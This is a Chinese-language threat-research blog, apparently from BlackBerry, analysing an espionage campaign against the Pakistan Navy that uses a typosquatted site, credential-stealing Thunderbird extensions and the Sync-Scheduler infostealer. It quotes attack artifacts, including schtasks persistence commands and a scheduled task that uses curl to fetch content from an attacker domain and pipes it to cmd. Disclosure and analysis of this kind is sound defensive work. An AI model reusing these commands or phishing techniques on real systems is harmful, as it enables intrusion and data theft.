概括
9 月初,作为 BlackBerry 威胁研究和情报团队对整个印度次大陆网络活动的持续监控的一部分,我们发现了一个有趣的 PDF 诱饵,乍一看似乎是巴基斯坦海军的内部 IT 通信。
当我们转向这个遗迹并追踪它的数字足迹时,我们发现了一个相互关联的基础设施网络,其中各种文件类型的遗迹似乎都有一个间谍主题,而它们的目的最终是向目标受害者提供一个隐秘的信息窃取者。
随着我们对这一活动的深入研究,我们发现一些战术、技术和程序 (TTP) 与之前发现的另外两个著名威胁组织使用的战术、技术和程序 (TTP) 重叠;然而,我们认为目前还没有足够的证据来证明其归因。
在这篇博客中,我们将研究这个未知威胁行为者的完整攻击链,并提供可行的补救建议。
技术分析
此次攻击活动的初始诱饵是一份 PDF 文档,该文档被设计成看起来像巴基斯坦海军内部 IT 备忘录,其中包含有关集成 Axigen Thunderbird 以进行安全电子邮件通信的说明。该诱饵文档包含用于获取所需文件的嵌入式 URL,目标用户将被引导下载并安装这些文件。
乍一看,下载链接似乎符合合法的巴基斯坦海军 URL,使用了安全协议和“ paknavy ”域名。
图 1:巴基斯坦海军初始诱饵文件。
然而,在本案中,威胁行为者使用了一种名为域名抢注的恶意搜索引擎优化 (SEO) 投毒技术,因为合法的巴基斯坦海军 URL 符合“ paknavy.gov.pk ”模式。
| 合法 URL | 虚假网址 |
| https://www.naknavy.gov.pk/ | https://www[.]paknavy[.]rf[.]gd/ |
表 1:被抢注的“Paknavy” URL。
检查位于“ hxxps://paknavy[.]rf[.]gd”的虚假 URL 页面后,我们发现它包含用于在用户与 ZIP 文件( Axigen_Thunderbird.zip )中打包的恶意 Thunderbird 扩展进行交互之前验证目标环境是否启用了 JavaScript 的代码。
表 2:Paknavy[.]rf[.]gd:在受害者环境检查时启用 JavaScript。
此时,可以安全地假设威胁行为者很可能事先知道巴基斯坦海军使用 Axigen 邮件服务器以及 Thunderbird 作为其电子邮件客户端。
在攻击的下一阶段,威胁行为者专门为此次活动制作了一份用于安装恶意 Thunderbird 扩展的自定义 Axigen 用户手册。这种程度的专注加上该组织为制作如此详细的文档所投入的时间和资源表明,其作案手法具有高度针对性。
图 2:恶意 Thunderbird 扩展的伪造用户手册。
一旦不知情的用户按照伪造的说明手册在其 Thunderbird 电子邮件客户端中安装恶意扩展,客户端就会显示标题:“邮件文件下载器” 。
然后,该扩展程序会显示专为“ @paknavy.gov.pk ”电子邮件地址设计的登录表单,误导受害者相信输入他们的凭证后就可以访问和下载他们的电子邮件。
图 3:Thunderbird 中安装的“邮件文件下载程序”扩展。
一旦用户输入其合法凭证并通过虚假登录表单提交,他们就会通过HTTP POST请求正文将其发送到“ hxxps://updateschedulers[.]com/receive_credentials[.]php ”。
如果服务器响应包含“ Credentials Received”,则会触发downloadFile() 函数,该函数进而调用以下代码:
| 下载文件(atob(“aHR0cHM6Ly91cGRhdGVzY2hlZHVsZXJzLmNvbS9maWxlX2Rvd25sb2FkLnBocD9sZj0=”)+ms);。 |
表 3:成功的 POST 返回代码。
嵌入的 base64 字符串解码为“ hxxps://updateschedulers[.]com/file_download[.]php?lf ”,其中“ ms ”是表示设备用户代理字符串的变量。getS()函数用于收集用户代理信息,然后通过返回检测到的相应缩写来识别受害者的操作系统 (OS),然后将其存储在变量“ms”中。
|
函数 getS() { const userAgent = navigator.userAgent; 如果 (/windows phone/i.test(userAgent)) {return "WP";} 如果 (/windows/i.test(userAgent)) {return "WIN";} 如果 (/macintosh|mac os x/i.test(userAgent)) {return "Mac";} 如果 (/android/i.test(userAgent)) {return "And";} 如果 (/linux/i.test(userAgent)) {return "LIN";} 如果 (/iphone|ipad|ipod/i.test(userAgent)) {return "iOS";} 返回 "Unknown";} const ms = getS() |
表 4:操作系统识别。
根据受害者设备上识别出的操作系统,威胁行为者的命令和控制 (C2) 服务器将通过返回名为“ Mail_Files.zip ”的相关 ZIP 文件进行响应。
在我们调查期间,虽然每个操作系统都返回了相应的 ZIP 文件,但只有 Windows 操作系统返回了实际的有效载荷,用于进一步利用。当从其他操作系统查询时,返回的 ZIP 文件最好被描述为包含良性文档或文件的虚拟文件夹。
我们对此有几种理论。这可能是因为威胁者只对针对 Windows 设备感兴趣,或者他们打算将来针对其他操作系统。或者,他们可能只是将此过程用作操作系统检查,以验证他们的有效载荷是否已发送到正确的机器进行引爆。
执行链
图4:执行链图。
最终有效负载:同步调度程序
最终的有效载荷是一种非常隐秘且功能强大的信息窃取程序,Cyfirma 的研究人员将其称为Sync-Scheduler 。它最早记录于 2024 年 3 月,尽管我们发现了早期的样本,根据其编译时间戳,这些样本似乎至少来自 2023 年中期。
此次特定活动中使用的样本似乎是 Cyfirma 研究人员今年早些时候记录的样本的较新版本。
Sync-Schedler 以 C++ 编写,具有强大的规避和反分析功能,其核心功能似乎自上次迭代以来基本保持不变。执行时,恶意软件会通过以下 Windows 管理规范 (WMI) 查询收集一些基本的机器元数据,例如通用唯一标识符 (UUID)。它按 UUID 进行过滤,这对应于以下注册表项:HKLM\SYSTEM\HardwareConfig\<UUID>。
图 5:UUID WMI 查询。
然后通过 HTTP POST 请求将该信息(带有唯一的签到字符串,格式为:“ uD=<UUID>, &ifangtaiyang=” )发送到威胁行为者的 C2 服务器,即packageupdates[.]net/r3diRecT/redirector/proxy[.] php 。
图 6:packageupdates[.]net 上的初始 C2 签入。
此 C2 服务器与 Sync-Scheduler 先前记录的活动中使用的服务器不同。最值得注意的是,任何手动导航到它的尝试都会导致用户被重定向到中国政府网站,这与旧版本信息窃取程序所见的网站相同。
图7:尝试手动导航到 C2 会将用户重定向到合法网站www.gov.cn。
该恶意软件最有效的逃避和反分析技术之一是使用加密数据块,这些数据块仅在运行时动态解密,其目的是实现持久性。
这是通过创建多个计划任务来实现的,每个计划任务都以常见的合法 Windows 软件命名,包括OneDrive、Skype和WindowsUpdate。这是威胁行为者试图使这些任务看起来没有威胁。这些任务配置为一个接一个地运行,间隔大约三个小时。
| 完整命令: |
| cmd.exe /c " schtasks /create /tn "OneDrive" /tr "cmd" /sc 一次 /st 09:30 /f && schtasks /create /tn "Skype" /tr "cmd" /sc 一次 /st 12:00 /f && schtasks /create /tn "WindowsUpdate" /tr "cmd" /sc 一次 /st 15:00 /f |
| 细分: |
| schtasks /create /tn “ OneDrive ” /tr “cmd” /sc once /st 09:30 /f |
| schtasks /create /tn “ Skype ” /tr “ cmd ” /sc once /st 12:00 /f |
| schtasks /create /tn “ WindowsUpdate ” /tr “ cmd ” /sc once /st 15:00 /f |
图8:计划任务命令行参数。
图9:计划任务创建。
Sync-Scheduler 的主要目的是查找特定常见类型的文档,将它们聚集在同一位置并做好准备以进行提取。
其代码深处隐藏着与每种文档文件类型相对应的硬编码字符串列表。它使用此列表比较并将每种文件类型扩展名替换为下表中显示的相应 ID 标签。
| 文件类型 | 身份标签 |
| .doc | X367 |
| .docx | X946 |
| X567 | |
| 。拉链 | X052 |
| .xls | X142 |
| .xlsx | X375 |
| .ppt | X593 |
| .pptx | X842 |
表 5:文档类型和相关 ID 标签。
图 10:目标文件类型替换字符串。
在查询受害主机并找到与目标文件类型之一匹配的文档后,将扩展名与列表中的扩展名进行比较。 如果匹配,则将其替换为相关的硬编码文件,然后复制到“ C:\Users\<user>\AppData\Roaming\System ”。
文件路径记录到名为“ Registry.log ”的文件中,该文件位于新创建的目录“ C:\Users\<users>\AppData\Roaming\FileRegistry\ ”中。
然后,文件内容会利用微型加密算法 (TEA)进行加密,之后再泄露到packageupdates[.]net。
有趣的关系
有趣的是,一些分析人员发现了另一个文件,其中包含与上面提到的几乎相同的计划任务创建命令结构。两者之间的唯一区别是使用“ daily ”而不是“ once ”。
这个名为KBUpdate.exe的文件的编译时间戳为2024-06-03 09:32:31 ,被发现嵌入在 Microsoft Access 文件Tax_List1.accde数据库的表中。这个极不寻常的执行链确保它在 8 月初上传到 VirusTotal (VT) 时完全避开了大多数供应商的监控。
它还包含一个程序数据库(PDB)路径,该路径的结构相似,似乎与我们的 Sync-Scheduler 示例中看到的路径相匹配。
| 文件名 | PDB 路径 | 恶意软件 | 类型 |
| 员工信息-Pak-Navy-2024.exe | C:\Users\用户\源\repos\MW-PAK-DataExt-Win\x64\Release\MW-PAK-DataExt-Win.pdb | 同步调度程序 | 信息窃取者 |
| 更新程序 | C:\Users\用户\source\repos\MW-BLACK-Shell\ | 黑壳 | 反向 Shell |
图11:两个文件的PDB比较。
经过分析,我们发现 KBUpdate.exe 和本报告中记录的最新版本的 Sync-Scheduler (Employee-Information-Pak-Navy.exe) 的代码库存在大量重叠。然而,其核心功能和用途本质上是不同的。
图 12:Sync-Scheduler 和 Black-Shell 之间的代码重叠。
引起我们注意的主要区别是 KBUpdate.exe(我们根据其 PDB 路径中的代号将其称为Black-Shell)最适合描述为恶意软件反向 shell。本质上,这是一个轻量级后门,旨在促进两台主机之间的通信,或者在本例中,受感染的受害者设备与攻击者控制的机器之间的通信。
与 Sync-Scheduler 的 Employee-Information-Pak-Navy.exe(共享其部分代码库)不同,Black-Shell 无法查找、加密然后窃取文件 或除其反向 shell 功能之外的任何其他内容。
情节愈发复杂
2024 年 8 月下旬,巴基斯坦用户将另一个具有类似Tax_List.accde特征的 Microsoft Access 文件上传到 VT。此文件执行的计划任务命令与高级持续威胁组织APT Bitter的策略一致,APT Bitter 是一个疑似南亚网络间谍威胁组织,至少自 2013 年以来一直活跃。此外,C2“ mxmediasolutions[.]com ”早在 2024 年 7 月就与该组织有关联。
|
cmd.exe /c schtasks /create /tn EdgeUpdateTaskMachine /f /sc 分钟 /月 14 /tr “conhost.exe --headless cmd /c curl -o C:\Users\public\documents\pic.jpg mxmediasolutions[.]com/addc.php?mg=%computername%_%username% & more C:\Users\public\documents\pic.jpg | cmd”
|
表 6:与 APT Bitter 关联的 Microsoft Access 文件计划任务命令。
其他发现
对类似恶意 XPI 文件的追溯搜索导致发现了四个针对巴基斯坦海军的扩展文件,所有这些文件都伪装成名为“ PN Mailbox E-signer ”的电子邮件签名扩展,也针对 Thunderbird 电子邮件客户端。值得注意的是,“ E-signer ”扩展文件的日期早于“ Axigen_Thunderbird.xpi ”扩展,最后一次修改记录在 2024 年 5 月下旬。所有四个文件都在 2024 年 6 月初的短时间内分发。
图 13:伪装成“PN Mailbox E-signer”的附加 Thunderbird 扩展文件,针对巴基斯坦海军。
“电子签名者”扩展包含混淆的 JavaScript,一旦安装在 Thunderbird 中,就会提示用户输入密码并显示以下消息:“常规电子签名将使新邮件保持更新。 ”有趣的是,提示并没有要求输入用户名或电子邮件,而是使用嵌入在 Base64 格式的 JavaScript 中的硬编码巴基斯坦海军电子邮件地址。
这些文件没有提供任何额外的有效载荷。所有扩展程序中的 JavaScript 的主要目的是捕获目标受害者的密码,并通过 POST 请求将其发送到“ hxxps://extension[.]webmailmigration[.]com/ajaxtension[.]php ”。巴基斯坦海军徽标的使用、扩展程序的具体命名以及(最值得注意的是)硬编码的电子邮件地址表明,这组文件具有很强的针对性。
| SHA256 | 姓名 | 首次出现 | PakNavy 电子邮件 |
| 9b318a99a95ae21a846d2997ac103ff9de07bcd60b3e7c2d391b4a227642f8fb | ilsc-313.zip | 2024-06-04 05:47:24 | ilsc-313 [在] paknavy.gov.pk |
| da9e4327bba989fc73280f3eee21cec9d13c1dc57a0df369ee95238c20846558 | 帕罗奥图 | 2024-06-05 05:08:35 | pnlo-kamra[at]paknavy.gov.pk |
| 3291fa800968f2becf4aedd2ca683b83274d4b863112dab406b1465faf904a3b | 电子签名.xpi | 2024-06-07 09:49:50 | adpn37[在]paknavy.gov.pk |
| b8405d8d3447ea30ae49d147926faf3709d604b2ea25e92b63b3dc42eb724214 | 附加组件.zip | 2024-06-12 16:40:27 | cicp_gsd[at]paknavy.gov.pk |
图14:本次活动的时间线。
当我们通过 C2 服务器updateschedulers[.]com和packageupdates[.]net的网络基础设施进行追溯时,发现了一些额外的、更旧但仍然有趣的痕迹。
我们观察到,今年 3 月左右,一系列文件被上传到 VirusTotal,这些文件构成了执行链的一部分,与本报告中记录的执行链并无太大差别。该执行链以针对巴基斯坦的诱饵开始,值得注意,因为这是 BlackBerry 研究人员首次发现updateschedulers[.]com和packageupdates[.]net被用作恶意活动的一部分,而且(我们认为)它们很可能被同一个威胁行为者使用。
我们发现的另一件有趣的事情是,这个特定执行链中的一个文件被网上的各种来源标记为WhisperGate样本,这是一个极具破坏性的恶意软件清除程序,于 2022 年 1 月针对乌克兰目标部署。
然而,经过进一步分析,我们可以确认这种怀疑是错误的,并且有问题的样本实际上是一个简单的下载器,它利用 curl 来检索执行链中的下一个文件,我们将其识别为 Sync-Scheduler 的一个版本,其中嵌入了 PDB C:\Users\user\Documents\Project-M\Visual Studio\MW-NEW_TELEMETRY-ExE\x64\Release\MW-NEW_TELEMETRY-ExE.pdb。
图15:“慈善基金及团体保险”诱骗文件。
网络
图 16:网络基础设施图。
| IP 地址 | ASL-ASN |
| 185[.]27[.]134[.]139 | Wildcard 英国有限公司 - 34119 |
| 185[.]227[.]82[.]38 | Access2.IT Group BV - 208258 |
| 146[.]70[.]149[.]223 | M247 欧洲 SRL - 9009 |
| 146[.]70[.]149[.]216 | M247 欧洲 SRL - 9009 |
| 185[.]227[.]82[.]65 | Access2.IT Group BV - 208258 |
| 146[.]70[.]80[.]58 | M247 欧洲 SRL - 9009 |
表 7:与此活动对应的 IP 地址详细信息。
| 领域 | 首次创建 | 上次更新 | 最后上线 IP | 注册主任 |
| paknavy[.]rf[.]gd | 2013-08-25 | 2024-09-06 | 31[.]22[.]4[.]234 | NameSilo有限责任公司 |
| updateschedulers[.]com | 2023-08-01 | 2024-10-19 | 185[.]227[.]82[.]37 | NameSilo有限责任公司 |
| 软件包更新[.]net | 2023-12-12 | 2024-02-11 | 146[.]70[.]149[.]216 | 人民代表处有限公司 |
| finance-gov-pk[.]rf[.]gd | 2013-08-25 | 2024-09-06 | 199[.]59[.]243[.]227 | 关键系统有限公司 |
| extension.webmailmigration[.]com | 2024-03-28 | 2024-03-28 | 84[.]234[.]96[.]91 | GMO 互联网公司 |
表 8:恶意域详细信息。
目标
图 17:此活动的受害者地理位置。
归因
在归因分析中,人们经常发现,当你深入挖掘时,往往会得出与最初假设不同的结论。这使得提供准确的归因分析成为一项复杂的工作。攻击者经常使用技术来掩盖其位置和身份,并使用“假旗”来模仿其他已知团体的 TTP,以“混淆视听”并误导调查人员。
对于黑莓观察到的最新攻击活动,就其归因而言,我们目前所了解的情况如下:目标受害者以及在这次攻击中观察和记录的 TTP 都表明威胁行为者拥有相对较高的复杂程度、能力和知识,很可能有进行间谍活动的动机。
此外,我们观察到的几个 TTP与之前记录的SideWinder组织针对中国实体开展的活动有明显的重叠。SideWinder是一个与印度政府结盟的威胁行为者,过去曾对巴基斯坦政府实体进行过间谍活动。
另一方面,BlackBerry 发现,此次攻击活动中有许多元素似乎与 APT Bitter 之前的行动一致。APT Bitter 是一个南亚威胁组织,其主要目标是针对南亚的组织和实体开展间谍活动,包括中国、巴基斯坦和孟加拉国等。尽管 APT Bitter 之前也被怀疑与印度政府有关,但这一点从未得到明确证实或证明。观察到的这些组织之间显然共享的元素包括重叠的网络基础设施、特定的 URL 格式、访问向量和其他 TTP。
尽管存在这些重叠之处,并且有迹象表明这两个组织都参与了攻击,但在撰写本文时,我们认为没有足够的证据证明这两个组织是攻击对象,因此我们认为此次攻击活动是由未知组织或组织发起的。但是,随着我们继续监控这一特定地理区域的威胁行为者,如果有更多支持性证据出现,我们将重新审视我们的调查结果。
结论
黑莓研究人员的调查发现,至少在 2024 年 9 月之前,巴基斯坦海军一直遭受着复杂的针对性攻击。根据攻击指标 (IoC),我们发现攻击与早在 2023 年中期就已开始的早期活动存在关联,并凸显了针对政府和国防部门的现代网络威胁日益复杂且持续。
通过采取战略性和深思熟虑的方法,威胁行为者采用了先进的技术、侦察和隐秘工具来获取目标凭证并窃取敏感信息,这强烈表明这个未知组织可能对间谍和海上情报感兴趣。
缓解建议
定期进行用户意识培训
建立、开展和更新定期的内部用户意识培训计划是保护您的组织免受各种网络风险侵害的最经济有效的方法之一。通过不断培训员工并让他们了解网络威胁的最新发展,各种规模的组织都可以建立出色的第一道防线来抵御网络攻击。定期培训使团队成员有信心和知识来保护自己和他们所代表的组织。
网络钓鱼防护
保护企业最外层对于保护您的组织免受网络钓鱼和社会工程攻击至关重要,因为它们依赖于人,而人是组织内安全链中最薄弱的环节。因此,现代电子邮件安全解决方案 (ESS) 或网络过滤解决方案与用户意识培训相结合,可以大大减轻这种攻击媒介的危害。
端点保护解决方案
部署先进的人工智能端点保护平台(例如BlackBerry 的CylanceENDPOINT™)可以帮助防范本研究中描述的威胁。
限制浏览器中的 JavaScript
通过全面而严格的组策略,IT 管理员可以预先配置受管设备上的浏览器设置,以禁用敏感计算机和网络上的 JavaScript。这对于防止依赖 JavaScript 作为攻击一部分的执行链(例如本博客文章中描述的活动中使用的执行链)大有裨益。
威胁情报
获得准确且最新的威胁情报是建立和维持有效网络防御态势的关键要素。这是因为它将使组织能够在潜在威胁升级为全面网络攻击之前主动识别并缓解威胁。威胁情报提供了有关威胁行为者正在使用的最新 TTP 的可操作见解,使防御者能够预测并制定针对最新攻击方法的对策。
攻击指标 (IoC):
